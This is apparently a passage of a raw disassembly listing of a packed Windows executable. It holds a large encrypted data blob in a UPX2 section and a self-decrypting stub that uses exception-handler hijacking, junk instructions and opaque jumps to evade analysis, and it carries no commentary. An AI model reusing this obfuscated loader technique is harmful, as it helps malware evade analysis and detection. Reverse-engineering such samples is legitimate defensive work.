0A3271AFCh, 961D159Ah dd 92C53669h, 0FBFEAAB6h, 0C770E421h, 16632DFAh, 5F1AC61Eh dd 14604091h, 0F74F9168h, 0CC9C1A01h, 8F5CE474h, 536FCEC2h dd 27304281h, 33438D5Ah, 0ABCB5A24h, 0B4C0A0F1h, 776F188h dd 1C040875h, 7A438960h, 0BBBE6E70h, 8894A4B4h, 53205A3Fh dd 1F705086h, 14848552h, 0B710D411h, 0BDD01DEAh, 0C499E6A3h dd 90E8B582h, 0A49F8008h, 0F681D2Eh, 46B3E612h, 7D27310Fh dd 1493C47Eh, 0D58FA5CFh, 37F94A16h, 0F24823DDh, 7154E12Bh dd 28E0267Ah, 0E99381C3h, 90703712h, 417BED5Bh, 7E79AFAAh dd 7FDCA976h, 0C4404230h, 2A74410Eh, 0B2CBF194h, 7D0FDB8Dh dd 0B5D9E62h, 0A2A4477Eh, 0B3B4BE06h, 2BB33829h, 0D069C986h dd 825B6275h, 0D3965282h, 7D9B266h, 833833EDh, 0C8FB24C4h dd 3D0340Bh, 0C1E9E936h, 0E9647229h, 6F733AC7h, 0CC3C4F95h dd 0F0856699h, 3466D7B7h, 0B358BA01h, 4B955A4Bh, 0D003C996h dd 0B923EA9Dh, 0A7B02BAFh, 0DD802DFAh, 53A739F5h, 0CB7D42B6h dd 7EC4A761h, 0F5AF81AFh, 26E5A4F6h, 5828F5EAh, 11CB590Bh dd 5665EB5Ah, 0BC4A7268h, 0C97331B0h, 0AC6237B2h, 71717A62h dd 0EABC8956h, 32885522h, 0D90BDDA8h, 0C6DFBA79h, 1FDA8218h dd 0E4A76D93h, 0B7854B9Bh, 0E9044DEAh, 0B0E3839Eh, 2DD34B17h dd 0B874044Eh, 0B285C515h, 3FA419E6h, 0A3E71A57h, 17E4B16Fh dd 0A5C41819h, 0FC19257Fh, 93D7687h, 66D95C7h, 7F55527Ah dd 20AC4F79h, 9D431787h, 3C198DEh, 0AB10EB95h, 0FDCA96Fh dd 0BAFC1011h, 0D03B2465h, 3268B4h, 6F7CB0CEh, 62AECC00h dd 0B2C31452h, 0B2986A0Ah, 87C3F63Fh, 3B08D5B1h, 6286C43Dh dd 0A1CF1949h, 0F61E6963h, 0E546CA4h, 6004B4F9h, 0FC386E82h dd 0CF8E81C9h, 0FE3B3502h, 0C57608Ch, 4150BDEFh, 93A5EF0Fh dd 0CBFD0257h, 7FB2D9A9h, 7BD80235h, 7CFCC996h, 9AA0D607h dd 89F10640h, 0F5095995h, 365EA9BFh, 4E94ACE4h, 0A0C4F439h dd 3C78EEC2h, 2087909h, 6D124547h, 7790AB8Eh, 0C978C30h dd 89B053B3h, 0AF64ACF2h, 6C626441h, 0E3DABDBCh, 0D1D434DBh dd 0EBD85514h, 37E1DEBEh, 3B20DB80h, 1FE8B987h, 0BCB9EF06h dd 88F0C4E1h, 0E9041DDCh, 0DAE3BEB2h, 1BDE8AF6h, 18A045CDh dd 85BF21AFh, 0FDD9E6E6h, 1418D389h, 7F513CBDh, 0B5B04B74h dd 94FADCE9h, 83CB15D4h dd 0FC90EE51h, 9AE0AD7Ah, 0E99301C3h, 0FD782F12h, 4C868421h dd 8395DD9Ch, 0F782D79h, 1B837542h, 0A41E115Eh, 1B41678Ah dd 0FF0CD9A6h, 694D5A24h, 54A44705h, 277FC2F2h, 6F3C0C3Eh dd 474502Bh, 8A59A158h, 0D39652BAh, 0A0E4AC8Bh, 396905E4h dd 0C854D1F4h, 35EB13FFh, 3064EA36h, 9EDEB10Dh, 675E01CEh dd 0C7C7865h, 6A339950h, 0CBAE5EB8h, 989BC97Dh, 6335624Eh dd 0BF794096h, 0C8C8A35Dh, 965762E7h, 970A7CAAh, 23990697h dd 0D4F8F3ADh, 0C1FFF7CBh, 0CC50D82Ah, 8F595272h, 0D2E1C6C2h dd 11CB550Bh, 0A291DC5Ah, 0B08C464Eh, 1EA775F2h, 5712CA10h dd 0A7FF7D0Fh, 0EFBC8C62h, 8410D0ABh, 3F9721D8h, 53209DB2h dd 0E8D4F20Dh, 0DD8020D7h, 0B784511Eh, 805668FAh, 790C8E33h dd 183A8682h, 1045768Fh, 1705C4FBh, 0C74C2FD9h, 4B18CD1Dh dd 14D8FAF5h, 0D5A01ACFh, 0ACAE7A16h, 8CB9E223h, 0DB91684Fh dd 0D0E09B45h, 0D9E7CE49h, 264DA6EBh, 0C04B098Dh, 9313C9E9h dd 271DC23Fh, 0E129A541h, 0C91D3651h, 0F05D7923h, 4D0DD5DCh dd 37932E92h, 0D4B033B5h, 0E7FD2D48h, 0B6CBF69Eh, 0BE331481h dd 7E29EFEh, 0F7F4E6F9h, 10AC0A16h, 6B38BD50h, 0F88F129Eh dd 0BE5D9681h, 0CFAA575Eh, 0A8B7BEFEh, 608AD07h, 493CCBE8h dd 0DFE09B11h, 0BFC45998h, 0E34A0D12h, 1630C117h, 0A4352A7Eh dd 0A38DA863h, 0CCE0616Bh, 0C1237EC7h, 6CA9F6C6h, 0A0073A6Dh dd 0BE93AC5Dh, 479F1E64h, 70A3D6D0h, 0E6BA2FFh, 3C70CEC0h dd 0CE3F72A5h, 8DBF1A71h, 7448A1FDh, 7190E41h, 2CBFE9D9h dd 10438CD2h, 535366DDh, 78ABDFC3h, 0A9C8FDCFh, 0F713467Ah dd 14477B73h, 4968D511h, 5163E215h, 4F1CFF5Eh, 0E48B5D82h dd 0E75C7EB1h, 0EE804D1Ah, 4C1FF467h, 90F1E584h, 73E4B17Dh dd 563B4FB5h, 0AF4A768Eh, 1D6A9C86h, 1D59DF2Fh, 10242875h dd 81277946h, 0CDA6462Eh, 32142A5Fh, 40A458A5h, 4C2BA976h dd 0DB887554h, 0F14E0Eh, 85400DD9h, 300E85E5h, 0BDB38F6h dd 0DFE7FA3Eh, 3D09D37h, 0E0B80676h, 608D5A1h, 27F4814Eh dd 0D024E935h, 26843906h, 64C7FA2Ch, 3707A81Ch, 0DF751E6Ah dd 0CF9C5F09h, 10607789h, 0A61F1184h, 0F333C9E9h, 37CF9C8Dh dd 42882FBBh, 0A15B917Bh, 6F7AFECAh, 2EFCC92Eh, 6B20C462h dd 0F76B9EC9h, 0A5588E6Fh, 6F0C48C6h, 1DC06127h, 9E4FB5Eh dd 0D7E805E3h, 70BB5F1Eh, 54FA703Dh, 0C527031Ah, 0CB65186Bh dd 5A675910h, 0B3FDA005h, 5724F188h, 184BC8Ah, 0D7190CA1h dd 0BB8B5514h, 8B2121EEh, 6B85483Bh, 0E013B9B0h, 0E1537EADh dd 8F21DC9Fh, 83501DDCh, 4974E1B6h, 42E8B582h, 0E7B48726h dd 9B68151Ah, 0F5B3E601h, 7D207837h, 3D60377Eh, 0E38645D7h dd 97E1CC9Eh, 9BAA15D4h, 7FB16459h, 13E8AD4Ch, 0D6D97946h dd 93E7F892h, 34511E8h, 0E6952A6Fh, 0FDC9F4Eh, 0AFA07542h dd 3AC9C115h, 76403BE2h, 828C69D2h, 0BEE9DECh, 5703053Bh dd 9548A2B7h, 0F1480CD6h, 3AD5055h, 7D4A158h, 0DAD4ED3Ah dd 0A7F18486h, 1C3A05E4h, 0D7A15217h, 3D0AB55h, 306F6EDEh dd 6609DDFDh, 17DCFE31h, 0B800CD98h, 0C9F305FBh, 6B056632h dd 7F6407C1h, 9CCF01B3h, 2DAC4D99h, 4E439562h, 0C7A25EB6h dd 905C7371h, 0A2561118h, 0A9F73A6Dh, 0F7C49364h, 0A3B417ABh dd 4BC29F6h, 587EA73Ch, 5DF7D5F4h, 56457A4Ah, 0BF8C6F1Eh dd 0FE4825F2h, 0B39978AAh, 0AEF08BB5h, 0D98439E3h, 0DC05DE22h dd 745417FEh, 7F99BA1Eh, 92ECB98Ch, 0DDA885E7h, 621A21Eh dd 7052FEEAh, 0EA991E12h, 1BE883BAh, 0E8A4814Eh, 0B380E39Eh dd 573FE6E6h, 0B4F6535Ah, 0C3713A81h, 66B04B75h, 37F846C4h dd 0F04815E2h, 712B791Bh, 3AA267Ah, 0BF8833C7h, 80984512h dd 75371994h, 31131499h, 68519262h, 50A84352h, 91642683h dd 0F8167FDAh, 9A8FFD9Ah, 0BEEB515h, 0B003F23Eh, 0A3703D0Ah dd 6E34735Dh, 0CC0BDDE8h, 825F56E9h, 0D3965296h, 0A7C9BCF1h dd 6B7805E4h, 3570D19Eh, 71D3859Dh, 46AC403Ah, 0AD57D5B7h dd 4F478ACEh, 0B6F7FD9Bh, 0FFFAA1C3h, 0CB986572h, 8F93338Ah dd 9F79159Bh, 0C4A53669h, 0D3BB966Eh, 96981305h, 0CCC4DEACh dd 0EF99749Fh, 0A2F8F3AAh, 0C1FB75E3h, 9C34AE2Ah, 1D6D26A8h dd 5BFB724Fh, 0B2CEC18Eh, 0F3F6B5F9h, 6DE55F53h, 996C738Ah dd 0BFD4A136h, 0DC0F672Ah, 0E3F6020Ch, 4C981F21h, 0B16C846Bh dd 5320EDBAh, 1AAD3496h, 66319627h, 0B7B26EFEh, 933798E9h dd 0E89FE980h, 1BE8B5E5h, 0CFF7AA4Eh, 0B3D2CA93h, 0FABB19E6h dd 4B2ED9D2h, 17E4B17Fh, 0A0777A3Eh, 0FDCE91Eh, 0DECDE242h dd 4714D796h, 6760AD7Ah, 0A5442B41h, 0F187BAE5h, 48A49C55h dd 46F3DD9Ch, 0E4F4E2FFh, 725FE4Fh, 44747731h, 0F843E6D8h dd 0BAFBF1EDh, 0BEE9DD7h, 0D7A4713Dh, 26FB297Eh, 6F0A3632h dd 4D858A1h, 82D7A158h, 0D39652F6h, 0D5E73107h, 0F7BD8EC2h dd 0E04E7A1h, 0A39520h, 0CE9423BFh, 0F8EB2540h, 0E2BF0196h dd 3336F23Eh, 0FFE4290Eh, 0C3DA6432h, 0C72730A7h, 5B936840h dd 0AA0BC9A0h, 0FBFEADC7h, 0D794612Eh, 1E632B8Eh, 5F1AE9A1h dd 0AE0FC524h, 0F7F2A9FBh, 0C3925D2Ah, 49A23D83h, 638D7035h dd 27F4C1B8h, 0F5B58D5Eh, 8728ECACh, 0EAF25C4h, 5712C91Bh dd 23F0FD8Ah, 0E8368223h, 0B9229720h, 6CA3C338h, 612767B3h dd 0C9EE1344h, 398B72B0h, 0D3A6DA7Ah, 81F65h, 7923950Bh dd 9FE7B582h, 184B7B90h, 8C18F8E5h, 0EAB319D0h, 4B2EDE60h dd 28700481h, 764F7D7Ch, 0AF4A7250h, 44C8986Fh, 0D299E198h dd 13D692F2h, 0DFC62B17h, 9404F0EDh, 0E2BB11E8h, 4326E66Ch dd 30A01C89h, 4E577574h, 0A7427A48h, 4D28B857h, 8AF3D990h dd 0BEE9A0Ah, 15318E68h, 20700B31h, 59037573h, 0D3CBD5A2h dd 7D4A16Eh, 52A10767h, 0A95B89EBh, 64C85DD2h, 2270545Fh dd 0C3559D5Ch, 3054EAF5h, 1EA93AF2h, 670214BAh, 3310F059h dd 0E3B9994Ch, 0EFE4E454h, 0E2155DF2h, 0A7D89DD9h, 5A033669h dd 11C7D67h, 157C9ED1h, 0F29FD205h, 270106E8h, 93EAF1C4h dd 0F7C4917Bh, 3C35B54Ah, 0B629D609h, 6B0CB149h, 199C7403h dd 0A34B8D6Ch, 850D3F2Eh, 0AE2B27F4h, 572499E8h, 0E77BBD75h dd 0BFEE893Ch, 879AC0DDh, 43D721D8h, 0F1E6CB2h, 6AB086B9h dd 0EF7E0651h, 487ED0F6h, 7C2FF515h, 8C7D1649h, 1BE8C13Ah dd 5F056A4Eh, 0B3804D35h, 7F4C040Eh, 4B3827B2h, 17E481C6h dd 0E3A0954Ah, 8BBE4916h, 7ACDADE2h, 44FCE1AEh, 0D1E0AD7Ah dd 8B21796Ah, 85B54936h, 0B44E95Dh, 43F8BDB3h, 84DCA976h dd 86985116h, 4AF55B85h, 7376355Dh, 0C0ED634Eh, 0F1AC48Dh dd 0D1A6763Eh, 0CF753C09h, 0BD108EC8h, 4415FF7Eh, 90004412h ; --------------------------------------------------------------------------- push ebp mov ebp, esp call sub_314548C2 call sub_3145494C jmp loc_314548F3 ; =============== S U B R O U T I N E ======================================= sub_314548C2 proc near ; CODE XREF: UPX2:314548B3p push dword ptr fs:0 mov fs:0, esp xor dword ptr ds:loc_31442042+2, ebp xor eax, eax push 20h push eax push eax push 80h push eax push eax push eax push eax push eax push eax push 80000000h call ds:dword_3143808C ; LoadLibraryA loc_314548F3: ; CODE XREF: UPX2:314548BDj mov ebp, 0 mov edx, [ebp-8] mov fs:0, edx sub eax, eax loc_31454903: ; CODE XREF: sub_314548C2+47j dec al or al, al jz short loc_3145490D jnz short loc_31454903 jmp short near ptr dword_31454974 ; --------------------------------------------------------------------------- loc_3145490D: ; CODE XREF: sub_314548C2+45j call $+5 pop ebx add ebx, 7F9Eh xor edi, edi xor edi, 2959h stc cld mov edx, 31h push ebx loc_31454929: ; CODE XREF: sub_314548C2+83j mov al, [ebx] cld cld cld cld cld sub ax, dx stc cld cld stc cld cld stc cld cld xchg al, [ebx] add ebx, 1 inc edx dec edi or edi, edi jnz short loc_31454929 pop ebx leave jmp ebx sub_314548C2 endp ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= sub_3145494C proc near ; CODE XREF: UPX2:314548B8p arg_C = dword ptr 10h mov eax, [esp+arg_C] pop dword ptr [eax+0B8h] xor eax, eax retn sub_3145494C endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 4 dd 6 dup(0) dword_31454974 dd 19Dh dup(0) dd 7FFD9000h, 1405h dup(0) UPX2 ends ; Section 4. (virtual address 0002A000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00000200 ( 512.) ; Offset to raw data for section: 0002A000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _idata2 segment para public 'DATA' use32 assume cs:_idata2 ;org 3145A000h dd 80h dup(0) align 1000h _idata2 ends end start